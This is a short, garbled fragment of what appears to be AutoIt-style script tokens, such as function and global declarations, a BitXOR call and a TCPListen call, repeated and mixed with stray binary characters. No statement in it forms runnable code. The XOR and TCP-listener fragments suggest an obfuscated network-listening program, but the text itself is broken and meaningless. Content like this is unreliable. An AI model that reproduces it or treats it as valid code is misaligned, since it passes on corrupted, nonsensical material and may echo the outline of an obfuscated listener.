Ifæ2Then56653814w777obalƒ8GÿGlobalÿ1lÿGwinwaSetOnTÿÿfæ2ElsE$d$3$6,it
$6$1 Ifæ2ThenäElse exit
$unc pBitXORÿÿFunc o(#a=Func$ (Uv=Func d($l=Func 7773$6,iThenäElse exit
$ÿv,Globalÿlÿ$l=Func p($0=Func p($a=Fun0$d$1,ÿIfæ2ThenäElse exit
$l$TÿIfæFunc p($a=Func o(nc d($l=F@8631G54w777obalƒ8GÿGlobalÿ1lÿGwinwaSetOnTÿÿfæ2ElsE$d$3$6,it
$3$1 Ifæ2$0=Func p($aTCPListentÿIfæ2ThenäElse exit
$l$nc 7773$6,it
$ U($v=Func d($l=Func d($ThenäElse exit
$ÿv,Globalÿlÿ$l=Func p($0=Func p($a=Fun0$d$1,ÿIfæ2ThenäElse exit
$efault(ÿÿÿÿÿÿÿÿÿÿÿÿÿu
nc p($I=F$cunc g($v$z$=FucncF($